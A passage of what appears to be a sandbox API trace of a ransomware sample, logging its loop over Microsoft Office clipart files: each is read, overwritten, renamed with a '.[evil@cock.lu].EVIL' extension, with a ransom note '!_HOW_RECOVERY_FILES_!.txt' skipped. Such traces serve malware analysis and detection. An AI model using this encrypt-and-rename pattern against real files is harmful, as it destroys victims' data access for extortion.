lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x332, lpOverlapped=0x0) returned 1 [0124.927] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.927] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.927] _errno () returned 0x84b1160840 [0124.927] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.927] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x340, lpOverlapped=0x0) returned 1 [0124.927] CloseHandle (hObject=0x1a8) returned 1 [0124.927] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.927] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.927] __uncaught_exception () returned 0x84b1160800 [0124.928] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.928] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00513_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00513_.wmf.[evil@cock.lu].evil")) returned 1 [0124.928] ??_V@YAXPEAX@Z () returned 0x1 [0124.931] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00513_.WMF", dwFileAttributes=0x200) returned 0 [0124.931] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.931] wcsstr (_Str="HH00524_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.931] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 69 [0124.931] wcscmp (_String1="HH00524_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.931] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00524_.WMF") returned 0x0 [0124.931] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF") returned 0x45 [0124.931] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.933] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3960, lpOverlapped=0x0) returned 1 [0124.961] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.961] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.961] _errno () returned 0x84b1160840 [0124.961] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.961] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x3980, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3980, lpOverlapped=0x0) returned 1 [0124.961] CloseHandle (hObject=0x1a8) returned 1 [0124.962] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.962] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.962] __uncaught_exception () returned 0x84b1160800 [0124.962] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.962] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00524_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00524_.wmf.[evil@cock.lu].evil")) returned 1 [0124.963] ??_V@YAXPEAX@Z () returned 0x1 [0124.965] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00524_.WMF", dwFileAttributes=0x200) returned 0 [0124.966] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0124.966] wcsstr (_Str="HH00526_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0124.966] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 69 [0124.966] wcscmp (_String1="HH00526_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0124.966] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00526_.WMF") returned 0x0 [0124.966] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF") returned 0x45 [0124.966] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0124.968] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x34e2, lpOverlapped=0x0) returned 1 [0124.997] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.997] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0124.997] _errno () returned 0x84b1160840 [0124.997] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.997] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x3500, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3500, lpOverlapped=0x0) returned 1 [0124.998] CloseHandle (hObject=0x1a8) returned 1 [0124.998] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0124.998] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0124.998] __uncaught_exception () returned 0x84b1160800 [0124.998] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0124.998] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00526_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00526_.wmf.[evil@cock.lu].evil")) returned 1 [0124.999] ??_V@YAXPEAX@Z () returned 0x1 [0125.002] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00526_.WMF", dwFileAttributes=0x200) returned 0 [0125.002] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0125.002] wcsstr (_Str="HH00527_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0125.002] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 69 [0125.002] wcscmp (_String1="HH00527_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0125.002] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00527_.WMF") returned 0x0 [0125.002] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF") returned 0x45 [0125.002] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00527_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0125.004] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16a6, lpOverlapped=0x0) returned 1 [0125.018] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0125.018] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0125.018] _errno () returned 0x84b1160840 [0125.018] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.018] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16c0, lpOverlapped=0x0) returned 1 [0125.018] CloseHandle (hObject=0x1a8) returned 1 [0125.018] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0125.018] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0125.018] __uncaught_exception () returned 0x84b1160800 [0125.018] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0125.018] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00527_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00527_.wmf.[evil@cock.lu].evil")) returned 1 [0125.021] ??_V@YAXPEAX@Z () returned 0x1 [0125.023] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00527_.WMF", dwFileAttributes=0x200) returned 0 [0125.024] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0125.024] wcsstr (_Str="HH00546_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0125.024] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 69 [0125.024] wcscmp (_String1="HH00546_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0125.024] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00546_.WMF") returned 0x0 [0125.024] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF") returned 0x45 [0125.024] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00546_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0125.025] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xe86, lpOverlapped=0x0) returned 1 [0125.033] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0125.033] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0125.033] _errno () returned 0x84b1160840 [0125.033] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.033] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xea0, lpOverlapped=0x0) returned 1 [0125.033] CloseHandle (hObject=0x1a8) returned 1 [0125.033] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0125.033] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0125.033] __uncaught_exception () returned 0x84b1160800 [0125.033] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0125.034] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00546_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00546_.wmf.[evil@cock.lu].evil")) returned 1 [0125.034] ??_V@YAXPEAX@Z () returned 0x1 [0125.037] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00546_.WMF", dwFileAttributes=0x200) returned 0 [0125.037] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0125.037] wcsstr (_Str="HH00601_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0125.037] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 69 [0125.037] wcscmp (_String1="HH00601_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0125.037] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00601_.WMF") returned 0x0 [0125.037] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF") returned 0x45 [0125.037] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00601_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0125.039] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5bc, lpOverlapped=0x0) returned 1 [0126.018] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.018] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.018] _errno () returned 0x84b1160840 [0126.018] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.018] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5c0, lpOverlapped=0x0) returned 1 [0126.051] CloseHandle (hObject=0x1a8) returned 1 [0126.051] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.051] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.052] __uncaught_exception () returned 0x84b1160800 [0126.052] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.052] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00601_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00601_.wmf.[evil@cock.lu].evil")) returned 1 [0126.059] ??_V@YAXPEAX@Z () returned 0x1 [0126.063] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00601_.WMF", dwFileAttributes=0x200) returned 0 [0126.063] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.063] wcsstr (_Str="HH00602_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.063] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 69 [0126.063] wcscmp (_String1="HH00602_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.063] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00602_.WMF") returned 0x0 [0126.063] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF") returned 0x45 [0126.063] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00602_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.066] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x578, lpOverlapped=0x0) returned 1 [0126.078] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.078] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.078] _errno () returned 0x84b1160840 [0126.078] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.078] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x580, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x580, lpOverlapped=0x0) returned 1 [0126.078] CloseHandle (hObject=0x1a8) returned 1 [0126.078] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.078] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.078] __uncaught_exception () returned 0x84b1160800 [0126.078] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.079] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00602_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00602_.wmf.[evil@cock.lu].evil")) returned 1 [0126.079] ??_V@YAXPEAX@Z () returned 0x1 [0126.083] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00602_.WMF", dwFileAttributes=0x200) returned 0 [0126.083] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.083] wcsstr (_Str="HH00612_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.083] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 69 [0126.083] wcscmp (_String1="HH00612_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.083] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00612_.WMF") returned 0x0 [0126.083] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF") returned 0x45 [0126.083] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00612_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.085] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3158, lpOverlapped=0x0) returned 1 [0126.103] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.103] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.103] _errno () returned 0x84b1160840 [0126.103] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.104] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x3160, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3160, lpOverlapped=0x0) returned 1 [0126.104] CloseHandle (hObject=0x1a8) returned 1 [0126.104] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0126.104] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0126.104] __uncaught_exception () returned 0x84b1160800 [0126.104] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0126.104] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00612_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00612_.wmf.[evil@cock.lu].evil")) returned 1 [0126.105] ??_V@YAXPEAX@Z () returned 0x1 [0126.109] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00612_.WMF", dwFileAttributes=0x200) returned 0 [0126.109] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0126.109] wcsstr (_Str="HH00623_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0126.109] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 69 [0126.109] wcscmp (_String1="HH00623_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0126.109] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="HH00623_.WMF") returned 0x0 [0126.109] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF") returned 0x45 [0126.109] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00623_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00623_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0126.112] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2994, lpOverlapped=0x0) returned 1 [0126.131] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.131] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0126.131] _errno () returned 0x84b1160840 [0126.131] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) 